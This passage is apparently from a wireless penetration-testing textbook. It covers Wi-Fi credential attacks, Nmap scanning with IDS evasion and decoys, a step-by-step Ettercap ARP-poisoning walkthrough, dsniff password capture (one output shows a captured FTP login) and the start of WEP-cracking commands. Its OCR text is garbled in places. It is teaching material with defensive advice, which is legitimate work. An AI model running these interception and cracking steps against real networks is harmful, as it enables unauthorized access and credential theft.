symbols. The more characters you have, the less likely you are to become a target. These attacks 
can be carried out with tools such as coWPAtty, genpmk, KisMAC, and wpa_crack. A PSK 
cracking attack is depicted in Figure 2.15: 


root@kali:~# cowpatty -h 
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com> 


Usage: cowpatty [options] 
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Packet capture file 
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Figure 2.15: PSK cracking 


Sniffing application credentials 


The attacker collects user credentials such as e-mail addresses and passwords from clear text 
application protocols when sniffing for application credentials. This is rare to happen on major 
websites since many are using HTTPS; nonetheless, when login onto wireless routers or access 
points, HTTP is generally used, which is unencrypted clear text. If you use the HTTP protocol to 
sign in, the attacker has easy access to your username and password. These attacks can be carried 
out with tools such as Ace Password Sniffer, dsniff, PHoss, and Win Sniffer, as shown in Figure 
2.16; 
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Figure 2.16: Sniffing 


Cracking domain accounts 


When using a brute-force or dictionary attack tool to crack domain accounts, the attacker 
recovers the user’s credentials, such as their Windows login and password, by cracking the 
NetBIOS password hashes. Some programs require browser-saved passwords from internet 
Explorer, Firefox, or Google Chrome. If an attacker obtains your credentials, they may be able to 
access network shares, send and receive e-mails, and potentially compromise the entire domain if 
the account has administrative privileges. These attacks can be carried out with tools such as 
John the Ripper, LOphtCrack, and Cain, as shown in Figure 2.17: 


root @kali: ~ 


root@kali: ~ x 


:-# john —format=raw-MD5S /root/Desktop/MDShash. txt 
Using default input encoding: UTF-8 
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3)) 
Warning: no OpenMP support for this hash type, consider —fork=2 
Proceeding with single, rules:Single 
MDS5Shash.txt Press ‘gq’ or Ctrl-C to abort, almost any other key for status 


Almost done: Processing the remaining buffered candidate passwords, if any. 
Proceeding with wordlist:/usr/share/john/password.\st, rules:Wordlist 
Proceeding with incremental :ASCII 


1g 0:00:00:09 DONE 3/3 (2020-05-03 19:37) ©.1057g/s 579306p/s 579306c/s 5793@6C/s pass 
e608 .. pasho13 
Use the “--show —format=Raw-MDS" options to display all of the cracked passwords reli 
ably 
Session completed 

# § 


Figure 2.17: John the Ripper 


VPN login cracking 


The attacker uses a brute-force attack on the VPN authentication protocols to obtain user 
credentials such as PPTP or IPsec passwords. Make sure the password and the pre-shared secret 
key are both unique and extremely secure. Passwords or numbers that are easy to guess can 
easily compromise a whole organization, resulting in consumer information being disclosed. 
These attacks can be carried out using tools such as IKE-scan, IKECrack, anger, and THC-pptp- 
bruter. The VPN login cracking attack is shown in Figure 2.18: 


# ike-scan 192.168.59.101 -M -A id=groupnamedoesnotexit 


Figure 2.18: IKE-scan 


802.11 identify theft 


The attacker collects user profiles from the clear text over wireless 802.11 in an 802.11 identity 
theft attack. Encryption is essential for ensuring that no data is compromised. While connected to 
a Wi-Fi network, using HTTPS and VPN protocols will help protect you from assaults such as 
this. This can be done with capture tools such as Wireshark or Ettercap-NG, as shown in Figure 
2,19; 


file Edit View Go Capture Analyze Statistics Help 
Beate SUOxse .*9eF2 BH A2QQ0 amas 
Filter: ~ Expression. Clear Apply 


Source Destination Protocol Info 


7.825277 192.168. 3.6 208. 80.152. 201 tcp 50074 > http [ack] seqe=1 
.825856 192.168. 3.6 208. 80.152. 201 HTTP Post /w/index. php?title~ 


7.952771 208. 80.152. 201 192.168.3.6 http > 50074 [ACK] seqel 


4 Frame 8 (161 bytes on wire, 161 bytes captured) 
4 Ethernet II, Src: Supermic_82:11:bd (00:30:48:82:11:bd), Dst: Buffalo_6f:ac:Sc (00:24:a5 
# Internet Protocol, Src: 192.168.3.6 (192.168.3.6), Ost: 208.80.152.201 (208. 80.152. 201) 


Hypertext Transfer Protocol 
Data (107 bytes) 
Data: 77704€61606530646F 6526777050617 37 3776F726430746F.. . 


6f ac Sc 00 30 2 bd 08 00 
30 40 00 50 06 ab 03 50 
9a 00 50 40 la 
4e 00 

i) 


t empt=Log 
0 ginToke 
38 66 2 6 28f 33af4 
9 39 34 64 63 65 2 64 37 0 38 6 994dce bd7fd0Se 


Data (date.data), 107 bytes Packets: 33 Displayed: 33 Marked: 0 Dropped: 0 


Figure 2.19: Stealing password using Wireshark 


802.11 password guessing 


An 802.11 password-guessing attack uses a captured identity to attempt to guess the user’s 
password on 802.11 authentications repeatedly. The attacker is likely to keep guessing default 
passwords, vendor names, most common passwords, birthdays, names, phone numbers, and 
other personal information until they have complete control of the wireless network. If the 
attacker has a large password dictionary, a dictionary attack can be readily carried out, and 
access gained in a few hours. These attacks can be carried out with tools such as John the Ripper 
and THC Hydra, as shown in Figure 2.20: 


Figure 2.20: THC Hydra 


802.11 LEAP cracking 


The attacker recovers user credentials from recorded 802.11 LEAP packets using a dictionary 
attack tool to crack the NT password hash in an 802.11 LEAP cracking attempt. This is 
dependent on the strength of the password; if it is strong, it is unlikely to be cracked, which is 
why it is critical to use a combination of letters, numbers, and symbols to avoid dictionary 
attacks. These attacks can be carried out with tools such as Anwrap, Asleap, and THC- 
LEAPcracker. Figure 2.21 serves as an example: 
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Figure 2.21: Asleap 


802.11 EAP downgrade attack 


EAP is required by 802.11 to deliver communications between the connecting user and the 


authentication. If an attacker can place oneself between the client and the authentication, the 
person connecting to the network is connected. Using falsified EAP-Response/NAK packets, the 
attacker compels a wireless 802.11 device or server to offer a lower type of authentication. 
Because the authentication is so poor, the attacker can acquire access in a matter of minutes. 
These attacks can be carried out using tools such as File2air and libradiate. Figure 2.22 serves as 
an example: 


root@kali:~# ./file2air -h 
file2air v@.1 - inject 802.11 packets from binary files <Joshua.Wright@jwu.edu> 
Usage: file2air [options] 

-i --interface Interface to inject with 

-c --channel Specify a channel (defaults to current) 

-m --mode Specify an operating mode (defaults to current) 

-r --monitor Specify RFMON mode (1=on, @=off, defaults to current) 


-f --filename Specify a binary file contents for injection 


-n --count Number of packets to send 

-w --delay Delay between packets (uX for usec or X for seconds) 
-d --dest Override the destination address 

-s --source Override the source address 


-b --bssid Override the BSSID address 
-h --help Output this help information and exit 


-v -verbose Print verbose info (more -v's for more verbosity) 


Figure 2.22: File2air 


Conclusion 


Several potential attack methods that can be employed over wireless were explored. Access 
control attacks, confidential attacks, credential attacks, and authentication attacks. We created a 
complete understanding of the user’s possible risks. 


We will go through how to scan wireless networks for information in the upcoming chapter, as 
well as different wireless scanning methods and how they can be used for both good and bad. 


uestions 


Mention the most famous access control attacks. 
Mention the most famous of confidential attacks. 
Mention the most famous of credential attacks. 


Poy 


Mention the most famous of authentication attacks. 


CHAPTER 3 


Wireless Information Gathering and 
Footprinting 


Introduction 


We hope you enjoyed reading the previous chapter and found it instructive, as it contained a 
wealth of information. In this chapter, we will discuss how to scan wireless networks for 
information, as well as several wireless scanning technologies and how they can be used for both 
good and negative purposes. 


You can ask or start wondering how difficult it is to scan for wireless networks. That is 
something that everybody can do! Yes, but what if the SSID is not visible? Are you able to find 
hidden wireless networks? The average user is unlikely to be aware of the existence of concealed 
wireless networks. 


You might also wonder why a hidden wireless network is so necessary. You may believe that 
keeping your identity hidden from others is a useful security precaution. Yes, it certainly is! 
Hidden wireless networks, however, can be used for harmful and other illicit purposes. 


Consider the following scenario: you are a security consultant for a company. Some files are 
missing or have been modified after business hours by a user who does not have physical access 
after office hours or remote access, according to a co-worker. You check the timestamps of the 
updated files and the files that were deleted after 2 a.m. and the name of the user who logged in 
and performed the changes. This user now claims that they did nothing wrong. Your co-worker 
tells you later that day that they witnessed the user put up a wireless access point or router in 
their cubicle. You inquire with your employer about the possibility of searching the user’s 
workspace due to a security concern. After exploring the area, you discover a Wi-Fi access point 
installed beneath the desk. This is clearly not a good situation! Anyone can now connect to the 
company’s network and access network shares and servers from anywhere within a wireless 
range. 


Structure 


In this chapter, we will discuss the following topics: 


e Footprinting 

e Wireless network discovery 
e Wireless scanning 

e Sniffing wireless networks 


e Identifying your targets 


e Protecting yourself from attacks 


Objectives 


You will learn how to scan wireless networks for information in this chapter, as well as see two 
different forms of wireless scanning and how they function. You will also learn how to use 
Ettercap to sniff wireless networks using ARP poisoning and how to use dsniff to gather login 
details. During a wireless penetration test, you will also be able to identify your targets. Finally, 
you will learn a variety of ways to defend yourself against these attacks. 


Footprinting 


Footprinting is the process of gathering information about a client’s network to construct a 
profile based on the data. It is critical that the attacker obtains information from the organization 
in a secure and professional manner without disclosing any confidential information. 


Footprinting normally entails two stages of reconnaissance. The first stage is to obtain data from 
the target to define the network range’s scope. The following are the most used tools for this: 

e Nslookup 

e Whois 


In the next stage, you should collect the following information: 


e Contact names, phone numbers, and e-mail addresses 
e Fach location and branch office 


e Company security policies 


Sending an e-mail or calling one of the employees and undertaking a social engineering method 
to determine how much information they are prepared to share would yield even better results. 
Then, look at the areas where security awareness training may be better. 


Wireless network discovery 


The best network applications recommended by network and security administrators will be 
covered in the next section. These tools can detect rogue hardware, software license violations, 
and even outages or performance concerns. The applications we selected are diverse and 
dependable. Even though we will only discuss two network discovery tools, we will provide 
some additional applications that we believe will benefit you and your company. 


Nmap 


Network Mapper (Nmap) is a well-known port scanner and network discovery tool. It is 
compatible with all major operating systems. Figure 3.1 serves as an example: 


File Actions Edit View Help 


Figure 3.1: Nmap 


Please visit for more information on Nmap. 


Nmap has a lot of command choices, and we might not recall all of them off the top of our heads. 
In the end, it is all about knowing your commands and which ones to use in which scenarios. As 
a pentester, you will need to be able to use most of these tools effectively. The following are 
some examples of them: 


e Operating system and version detection: As illustrated in , these commands 
will return results for the operating system and software versions: 


File Actions Edit View Help 


Figure 3.2: Nmap -A command 


The following are some commands: 


© nmap -A 192.168.1.7: The operating system, service versions, and traceroute 
results will all be displayed with this command. 


© nmap -v -A 192.168.1.7: During the scan, this command will display more 
detailed information, including the operating system, service versions, and 
traceroute output. 


© nmap -O 192.168.1.7: Only ine operating system will be displayed with this 
command, as shown in 


Figure 3.3: Nmap -O command 


o If you use -osscan-guess, the scan will guess more aggressively, as shown in 


IN(Wl+FFFFAW2=FFFFS 
FFFFS OoM 


Figure 3.4: Nmap -O -osscan-guess command 


© nmap -A -iL /tmp/hosts.txt: This command will look for the operating system 
and service version information, as well as do a traceroute. po text file will then be 
used to input a list of hosts or networks, as shown in 


Figure 3.5: hosts.txt 


Refer to F : 
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Figure 3.6: Nmap -A -iL command 


e Service scan: These commands will display information about the host’s services and 


ports, as well as whether the host or network is protected by a firewall. 


shows 
this: 


View Help 


Figure 3.7: Nmap -sV command 


The following are some commands: 


© nmap -sV 192.168.1.7: This command will look for open ports to see what 
services and versions are currently available. 


© nmap -sA 192.168.1.7: This command is used to do a policy scan on the firewall. 
It will show whether the firewall is simply a packet filter that is blocking SYN 
packets. It sends an ACK packet to the destination; if it receives a response, it is 
open; if it does not receive a response, it is running a packet filter, as shown in 


Figure 3.8: 
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Figure 3.8: Nmap -sA command 


e Bypassing firewall filters: This command can be used to scan a firewall-protected host or 
network. This command is also affected by the firewall filters in use. Figure 3.9 
demonstrates the technique: 


Figure 3.9: Nmap -PN command 


The following are some commands: 


© nmap -PN 192.168.1.7: The host will be scanned as though it were online with this 
command. If you cannot access a host using ping or scan, this can be useful. 

© nmap -PS 192.168.1.7: This command does a TCP SYN discovery scan on the 
specified ports. 

© nmap -PA 192.168.1.7: This command will do an ACK discovery scan against the 
specified ports. 


e Scanning for firewall vulnerabilities: These commands will look for typical firewall 
exploits that rely on a flaw in the TCP network protocol being discovered, as shown in 


Figure 3.10: 


& 


192.168.1.7 
Starting Nmap 7.91 ( https://nmap.org ) at 202 
Nmap scan report for cil@-hplp-23 (192.168.1.7 


1-12-14 17:51 EST 
) 

Host is up (0.00015s Latency). 

ALL 1060 scanned ports on cilO-hplp-23 (192.168.1.7) are closed 
MAC Address: 34:F6:4B:BD:768:27 (Intel Corporate) 


Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds 


Figure 3.10: Nmap -sN command 
The following are some commands: 


© nmap -sN 192.168.1.7: This is a null scan command. Because the null scan sets no 
bits, it can be used to get around a non-stateful firewall and packet filter. 


© nmap -sF 192.168.1.7: This is a FIN scan command. Only the TCP FIN bit will 
be set by the FIN scan. When a FIN packet is sent to an open port, the open port 
simply ignores it, whereas the closed port is redirected to an RST packet, which, in 
turn, reveals which ports are open and closed in Nmap. 


© nmap -sX 192.168.1.7: This is an Xmus scan command. The Xmus scan can be 
used to see if a target machine’s ports are open or closed. This scan transmits TCP 
segments with all the packet header flags. 


e Packet fragments: To make it more difficult for packet filters, intrusion detection 
systems, and firewalls to identify your scan, this command separates the TCP header into 
many packets. If you want to execute a stealth scan on a network without raising a flag, 
you will need these commands. As an example, consider Figure 3.11: 


o Nmap -sS -p 80 -f 192.168.1.7: This command does a TCP SYN scan on 
192.168.1.7 port 80 without triggering any intrusion detection systems or alarms. 
Please keep in mind that the setup and policies of the firewall or IDS also play a 
role. 


SERVICE 
http 
4:F6:4B:BD:7 


1 IP address ( 


Figure 3.11: Packet fragment command 


e Firewall decoys: You can use this command to spoof a host to a remote host. An IDS and 
network administration will be completely ignorant that a network scan is taking place if 
the spoofing is done correctly. A sample command is as follows: 


© Nmap -n 192.168.1.7 -D 192.168.1.110: This command scans a host without 
issuing a DNS request, and it also includes a decoy set for 192.168.1.110, which 
makes it appear as if the scan is being conducted by 192.168.1.110 rather than the 
Kali Linux host. Refer to Figure 3.12: 


12-14 18:65 EST 


Figure 3.12: Firewall decoys command 


Zenmap 


Zenmap is a graphical frontend for Nmap that runs on multiple platforms. It simplifies the use of 
Nmap and includes prepared instructions for running scans on the fly. 


Refer to Figure 3.13: 


™ Zenmap - 
Scan Jools Profile Help 
Target: 192.168.1.7 “| Profile intense scan . Scan) Cancel 


Command: nmap -T4 -A -v 192.168.1. 


Services Nmap Output Ports/ Hosts Topology Host Detals Scans 


OS 4 Hest . nmop -T4-A -v 192 168 1.7 


Mt: Loaded 15> scripts tor scanning 

NSE: Script Pre-scanning. 

Initiating NSE at @1:18 

Completed NSE st @1:18, 0.@1s elapsed 

Initiating NSE at 1:18 

Completed NSE at @1:18, 8.005 elapsed 

Initiating NSE at 01:18 

Completed NSE st 61:16, 9.005 elapsed 

Initiating Parallel ONS resolution of 1 host. at 01:18 
Completed Parallel OMS resolution of 1 host. at @1:18, @.0ls elapsed 
Initisting SYN Stealth Scan at @1:18 

Scanning cil@-nplp-23 (192.168.1.7) [1000 ports} 
Discovered open port 139/tcp on 192.168.1.7 

por tcp on 192.168.4.7 

open por 35/tcp on 192.168.1.7 

1 port 443/tcp on 192.168.1.7 

port 8@8/tcp on 192.168.1.7 


port 912/tcp on 192.168.1.7 

Oiscovered open port 5557/tcp on 192.168.1.7 

Discovered open port 9@2/tco on 192.168.1.7 

Completec SYN Stealth Scan at @1:18, @.@8s elapsed (1008 total ports) 
Initisting Service scen st 01:16 


Figure 3.13: Zenmap 
Please visit https://nmap.org/zenmap/ for more information on Zenmap. 


Wireless scanning 


Wireless access points are always looking for more wireless access points to connect. 802.11 
radios operate at frequencies ranging from 2.4 to 5.85 GHz. Passive and active scanning are the 
only two approaches available. 802.11 radios, by default, execute both scans on all channels 
authorized by the country’s operating laws. 


The penalty for operating without an FCC permit or license could result in a significant fee even 
for a single day of operation. You might wonder who the FCC is. The Federal Communications 
Commission (FCC) oversees overseeing and regulating the US telecommunications industry, 
which includes the internet. Why might this be a cause for concern? The purpose of the internet 


is for everyone to have access to it without discrimination, blocking, censorship, or network 
throttling. To recapitulate, the FCC is proposing new internet laws and contracts that will allow 
internet service providers to charge a premium or sell a paid-to-use service that will slow down 
your internet if you do not have the extra cash. Before doing any local broadcasts or scans, 
please consult your country’s wireless communication team. 


Passive scanning 


During a passive scan, beacons and probe responses are monitored. The client’s radio transmits 
a once-per-second scan and then audits the packets on the wireless network. Because passive 
scans are used to connect clients to access points, they are always enabled. 


Active scanning 


Only channels that are approved by government rules are actively scanned. Active scanning is 
enabled by default; however, it can be removed from the profile or settings of the wireless 
adapter. During an active scan, the radio sends probe requests to other devices in the area with a 
null SSID name to encourage probe answers. In other words, access points actively seek out and 
listen to other devices, as shown in Figure 3.14: 
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Figure 3.14: Active scanning 


How does scanning work? 


The access point must change channels to scan outside the range of operation. These wireless RF 
channel scans from the access point occur once every second and at various channel ranges until 
all the channels have been cycled through, as shown in Figure 3.15: 


RF Channels (U.S.) 


Amplitude 


2.4GHz Frequency Spectrum 
Figure 3.15: RF channels 


After roughly 25-30 milliseconds, the wireless access point will quit the RF channel. Scans are 
timed to avoid interfering with the transmissions of other beacons. After the channel shift is 
complete, the probes are dispatched. Keep in mind that if speech, video, or other significant data 
usage is detected, the scan frequency will be lowered. 


Sniffing wireless networks 


Can we really smell wireless networks? Sounds funny, right? No, but with the correct tools and 
equipment, you can! Wireless sniffing is an eavesdropping technique used on a wireless network 
by programs or tools. Wireless, which stumbles around networks, is less intrusive than sniffing. 
Wireless sniffing is used to diagnose network problems and protocols on a wireless network. 


Connections, both wireless and wired, can be monitored and sniffed. Because wireless networks 
communicate via radio signals, sniffing them is significantly easier. An attacker could sit in a car 
outside a business and sniff a wireless network for sensitive information that he or she could use 
for personal advantage, attention, or money. 


Frames are small bits and pieces of information that are divided into small bits and pieces by 
networks. Data packets are contained within these frames. Frames, packets, or both could be 
targeted by an attacker. 


An attacker could use frames to detect concealed wireless networks in the region and get 
unauthorized access if the networks are not following the most up-to-date wireless encryption 
standards. These approaches are used by network administrators to debug network faults. 


The Wireshark application 


Wireshark is a packet analyzer that is both free and open source. It is used to troubleshoot and 
analyze networks. It captures and displays network packets in detail. Wireshark is used by 
network and security managers to diagnose network and security issues. 


Years ago, there were a variety of tools accessible, all of which were somewhat costly to use. 
Wireshark has changed that by making itself available to the public for free. Wireshark is one of 
the most powerful open-source packet analyzers currently available. 


Wireshark has several uses. It will be used by network administrators to discover and 
troubleshoot network issues. Security issues can be investigated by network security engineers. 
Protocol implementations can be debugged by developers. Users can gain a good understanding 
of how network protocols work and how an attacker could potentially compromise them. 


Wireshark is particularly useful in the real world for viewing real-time packets to diagnose Web 
application issues, authentication concerns like a three-way TCP handshake, and auditing. 
Wireshark will tell you where the packets came from, where they are going, and what they are 
for. 


You could, for example, see if one user is using more network traffic than others. During 
business hours, this user could be downloading or watching YouTube videos in large quantities. 
You can reduce that user’s bandwidth so that the network is not slowed down for everyone else. 


Wireshark is a network protocol analyzer that runs on Windows, Mac OS X, and Linux. For 
more information on features and support, go to https://www.wireshark.org/. Wireshark is 
preinstalled on Kali Linux, so you will not have to install it. However, you may need to install it 
on whatever operating system you desire. There are other network protocol analyzer tools such 
as SolarWinds deep packet inspection and Analysis tool, Net flow analyzer, and PRTG Network 
Monitor. 


Ettercap 
Ettercap engages in man-in-the-middle attacks to impersonate a router or server. 


Ettercap could be used by an attacker for the following purposes: 


e To manipulate data 
e To gather passwords for protocols such as FTP, HTTP, POP, and SSHv1 
e To fake SSL certificate in HTTPS sessions 


Following ARP spoofing, we will position our Kali Linux system as the man-in-the-middle in 
this Ettercap demonstration. Let us get started! 


1. Open a bash terminal and type ettercap -G: to launch Ettercap in graphical mode, as 
shown in Figure 3.16. Select Primary Interface wlan®, then accept the setting: 


File Actions Edit View Help 


ettercap 6.8.3.1 copyright 2001-2620 Ettercap Development Team 


€ Ettercap 


Figure 3.16: Ettercap 
2. Select Hosts, then Scan for hosts from the drop-down menu, as shown in 


Ettercap 


Figure 3.17: Scan for hosts 


3. Click on Hosts, then on the Hosts list, as shown in 


Ettercap 


IP Address MAC Address Description 


92.168.1.1 


Add to Target 1 


Figure 3.18: Host list 


4. Add to Target 1 after selecting the router’s IP address. Select another IP address from the 
list and click Add to Target 2 if you want to target another router or server, as shown in 


Ettercap 


IP Address MAC Address Description 


192.168.1.1 


»d to TARGET2 


Figure 3.19: Add targets 


If you do not choose anything, the entire subnet will be ARP-poisoned. This should not be 
executed on a production network! The router we will be using for this example has the IP 
address 192.168.1.1. 


5. After then, go to Mitm and then ARP poisoning, as shown in 


gO Ettercap 
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Figure 3.20: ARP poisoning 


6. Check the box Sniff remote connections, as shown in : 


Sniff remo 


Uniy poison ¢ 


Figure 3.21: Sniff remote connections 


7. Click on Start and then click on Start Sniffing, as shown in F : 


Ettercap 


MAC Address Description 


Figure 3.22: Start sniffing 


An attacker only needs to conduct a modified or filtered attack on the subnet now that it has been 
trapped in a man-in-the-middle attack. These filters can be used with Ettercap’s plugins or 
constructed from scratch. Common attacks such as DNS spoofing, FTP prompt changes, and 
SSH downgrade attacks occur here. The end-user will be completely unaware of the situation. 
Wireshark can be used by a network administrator to figure out where the packets are coming 
from and track down the attacker’s IP address. Do not use default or automatic security settings 
as a rule. Enforce the greatest level of security possible and educate employees on security best 
practices. 


dsniff 


dsniff is a powerful password sniffer that can detect a wide range of network protocols, including 
Telnet, FTP, SMTP, POP3, IMAP, HTTP, CVS, Citrix, SMB, Oracle, and many others. 
Although Wireshark can reveal a great deal about packets, dsniff can reveal usernames and 
passwords. You can choose the interface to listen on and save the results to a file format that you 
can read later. Let us look at a few examples of how to use dsniff, as shown in Figure 3.23: 


® 


Version: 2.4 


Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] 
{-f services] [-t trigger[ ]] (-r]-w savefile] 
[expression] 


Figure 3.23: dsniff tool 
Perform the following steps: 


1. Open a new Terminal window. 


2. Type the following command: dsniff -i wlano. Option -i is the network interface 
where we selected wlan, as shown in Figure 3.24: 


root@kalk ~ 
File Actions Edit View Help 


z [~ 


wland 
dsniff: listening on wland 


Figure 3.24: dsniff -i wlan0 command 


3. Sign in with an account for just about any of the system protocols mentioned earlier, as 
shown in 


root @kslr ~ 


File Actions Edit View Help 


A] Be 
45.88.198.262 

Connected to 45.88.198.202. 
220 FIP Server ready. 
Name (45.88.198.202:kali): u595688373 
331 Password required for u595688373 
Password: 

95688373 Logged in 

em type is UNIX. 
Using binary mode to transfer files. 
ftp> quit 
221 Goodbye. 


Figure 3.25: FTP protocol 


4. If you appear back at some other Se you should note that dsniff has exposed your 
login credentials, as shown in 
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® oe 
etho 


dsniff: listening on ethd 


12/17/21 12:45:00 tcp 192.168.1.14.48102 -> 45,.88.198.202.21 (ftp) 
USER u595688373 
PASS 0x4186GAhmed 


Figure 3.26: dsniff output 


If anyone should sign in making use of no encryption, dsniff will grab login credentials. For this 
reason, it is highly recommended to always use encryption when it is available to an individual. 
Please make sure you are using the most recent TLS standard and a fantastic security certificate 
with 2,048+ little-bit keys. If, however, you become configuring a server, change the default slot 
to something distinctive. This can help reduce the number of potential assaults and any security 
risks that are probably obtainable in the wild. 


Suppose you wished to sniff the remote pc for passwords on the neighborhood LAN using 
dsniff? Certainly, no problem! There exists a device called arpspoof that may enable you to 
spoof your attacking personal computer IP address to become a default gateway or man-in-the- 
middle attack. Because of this attack to function, you need to enable IP routing for the computer 
to effectively establish the correct communication between both computer systems. 


Identifying your targets 


As a penetration tester, it is important to understand and understand who your goals are. There 
exist many more than just computer systems to consider. Servers, smartphones, pills, and 
network hardware may also be a section of the penetration check. Knowing whether software 
programs or program patches have already been applied or not really is extremely important once 
we would not like unauthorized access to the unit and systems, specifically in a production 
atmosphere. 


Tools like Nmap and Zenmap may be used to scan a whole network. Even though it is a quick 
solution to get information like the operating system and software edition, it is not always 
accurate. Based on the scenario, it is sometimes better to go to each gadget and system to learn 
what is used on the network. Inquiring the client for system documentation and hardware stock 
can be very useful if they can offer that information. 


Protecting yourself from attacks 


No issue what the problem is; we always have to know how exactly to protect ourselves from 
any threats that could occur. Whether it is from within or beyond your network, you will have to 
provide yourself with knowing how you might be affected by an individual or company. There 
are several solutions to protect yourself from like attacks: 


e Protection against Nmap and Zenmap: 
o Create custom firewall rules and access list 


o Any hardware IDS that are monitoring network traffic 24/7 
© Block or filter ICMP pings 


e Protection against wireless scanning: 
o Configure the latest wireless encryption algorithm 
o Configure MAC filtering rules 


o Turn off or hide wireless broadcast 
© Turn off UPnP support 


e Protection against sniffing wireless networks: 


o Use SSH and HTTPS instead of Telnet and HTTP 
© Connect using a VPN service 


© Connect to only trusted wireless networks 


Conclusion 


In this chapter, you discovered how exactly to scan wireless systems for info, saw two various 
kinds of wireless scanning, and discovered how they function. You saw how exactly to sniff 
wireless systems by ARP poisoning with Ettercap and how exactly to use dsniff to get login 
credentials. We furthermore discussed how to determine your targets throughout a wireless 


penetration test. 


Finally, you learned a number of different solutions to protect yourself from these assaults. It is 
very important to keep your mindset of being an attacker since it will open up your eye to even 
more security threats that could potentially threaten you to be an individual or company. Always 
hook up to trusted wireless systems, use encryption when it is available, and make use of a VPN 
when traveling. 


Now, you are ready to move on to Chapter 4, Wireless Vulnerability Research. 


uestions 


What is Footprinting? 
Mention the most famous of wireless network discovery tools. 
What are the types of wireless scanning? 


How do you protect yourself from wireless scanning? 


OB 


Mention the common tools of Network Protocol Analyzer. 


CHAPTER 4 
Wireless Vulnerability Research 


Introduction 


In this chapter, you become familiar with how to strategy an attack and crack WEP/WPA/WPA2 
wireless networks and can learn Mac spoofing to get unauthorized access to a network. 
Additionally, you will learn to protect yourself from most of these threats. This chapter could 
have hands-on, step-by-step guidelines with Kali Linux. Remember that you will just be able to 
adhere to the cracking portion of this chapter in case you have the cellular cards or adapters 
pointed out towards the finish of Chapter 1, Wireless Penetration Testing Lab Setup. 


Before we start, there are some things that you need to know before we crack any wireless 
networks: 


e Cracking any wireless system without authorization is illegal 


e If you are captured without authorization, you will face the consequences in accordance 
with the law inside your area 


e Please only demonstrate methods by your own network 


Structure 


In this chapter, we will discuss the following topics: 


e Planning an attack 
e Wireless password cracking 
e Spoofing your MAC address 


e Protecting yourself from attacks 


Objectives 


In this chapter, you will learn how to put a plan for an attack. Next, you will learn several 
methods for an attack. Then, you will learn detailed information on WEP, WPA, and WPA2 
encryption. Finally, you will learn several ways to reduce the risk of a wireless attack. 


Planning an attack 


Before we work on any wireless scans or cracks in any wireless encryption, the very first thing 
we must do is plan an attack. We must make sure we have everything to run a wireless 
penetration and ensure that we ask ourselves as many questions as possible so that we do not 
come across any obstacles along the way. Let us start with a listing of requirements and the steps 


we Shall get to crack a wireless network. 


Wireless attack 


Right here, we have a listing of what is necessary to conduct a complete wireless attack: 


e A compatible wireless adapter: Note that it must support packet injection. 
e The Kali Linux operating system: All our security tools are preinstalled. 
e Pen and paper to take notes: This will help us to keep organized. 


The plan for attacking wireless networks 


Listed here are the actions to plan a wireless attack: 


1. Scan for a list of wireless networks in the area. 
2. Take note of the BSSID, Channel number, and encryption. 
3. List several attack methods that you will use to attack: 
1. Airodump 
2. Aircrack 
3. Dictionary attack 
4. Default logins 
5. Password guessing 
4. Proceed with each method. 
5. Record both successful and unsuccessful results. 


6. Try again. 


Wireless password cracking 


There are various methods to crack wireless encryption. Here, we will discuss the most typical 
solutions to crack wireless networks. In the next several sections, we will discuss what each 
wireless encryption is in excellent detail and will demonstrate how exactly to crack those 
wireless encryption varieties. Let us begin! 


WEP encryption 


Even though the WEP protocol was acknowledged to be defective as early as 2000, it is still in 
use, and access points are being shipped with WEP-enabled capabilities. 


WEP has several cryptographic flaws that have been identified by Walker, Arbaugh, Fluhrer, 
Martin, Shamir, KoreK, and others. The cryptographic evaluation of WEP is outside the scope of 
this book because it necessitates a thorough understanding of sophisticated math. In this section, 
we will look at how to crack WEP encryption on the Kali platform using easily available tools. 
This includes airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and additional tools from the 
aircrack-ng suite. 


The usage of RC4 with a short IV value that is recycled every 224 frames is WEP’s core flaw. 
Although this is a huge amount, per 5,000 packets, there is a 50% probability of four reuses. To 
take advantage of this, we generate a huge quantity of traffic to enhance the possibility of reused 
IVs and so compare two cypher texts encrypted with the same IV and key, as shown in Figure 
4.1: 
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Figure 4.1: WEP encryption 


Cracking WEP encryption 


We will go through step-by-step instructions on how to crack WEP encryption in this part. 


1. Connect to our access point Wireless Lab and navigate to the section of the settings that 
deal with wireless encryption mechanisms, as shown in Figure 4.2. Setting the Security 
Options to WEP on my access point accomplishes this. We will also need to adjust the 
length of the WEP key. We have configured WEP to use 64bit keys, as indicated in 
Figure 4.2. We have set the default key to WEP Key 1 and the 64-bit WEP key value to 
0123456789 in hex. You can change it to whatever you want. 
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Figure 4.2: Netgear router setting 


Once the changes have been made, the access point should now be able to use WEP as an 
encryption method. Let us get the attacker machine up and running. 


2. Open a Terminal window and type the following command, then hit Enter: 
airmon-ng start wlano 


The wlano interface will be started in monitor mode with this command. Monitor mode 
allows your computer to listen in on every wireless packet that passes through your 
wireless card’s range. We will be able to inject packets into a wireless network using this 
technique. The result is shown in Figure 4.3: 


File Actions Edit View Help 
2 = 


start wlan6d 


m using rmon-n > tting 
in monitor mode, they i € hanging channels 
S putting the i 


tworkManager 
supplicant 


PHY Interface Driver Chipset 


phys wland t760 Ralink Technology, Corp. MT7601U 


Figure 4.3: airmon-ng command 


3. Then press Enter after typing the following command: 
airodump-ng wlano 


This command turns on the wireless interface’s monitor mode. The result is shown in 
Figure 4.4: 


Figure 4.4: airodump-ng command_1 


4. Press Enter after typing the following command: 
airodump-ng -c 1 -w capture --bssid DC:EF:09:59:B1:1F wlano 


The components of the command are as follows: 


e -c: this is the channel 
e -w: this gives a write access to a file 


e -bssid: this is the wireless access point MAC address 


Figure 4.5 is the output of the previous command: 


Figure 4.5: airodump-ng command_2 


Let us connect our wireless client to the access point and use the WEP key 0123456789. 
When the client connects successfully, airodump-ng should display a message on the 
screen. 


To exploit flaws in the protocol, we require a large number of data packets encrypted with 
the same key as in the scenario of the busy network as well. As a result, we will need to 
make the network produce more data packets. We will use the aireplay-ng utility to 
accomplish this. 
5. Press Enter after typing the following command, as shown in Figure 4.6: 
airplay-ng -1 1000 -q 10 -e ‘Wireless Lab’ -a DC:EF:09:59:B1:1F -h 
00:11:22:33:44:55 wlanO --ignore-negative-one 


The following are the components of the command: 


e -1: This is the number of packets per burst 

e -q: This is the number of seconds between keep-alives 
e -e: This sets the target AP SSID 

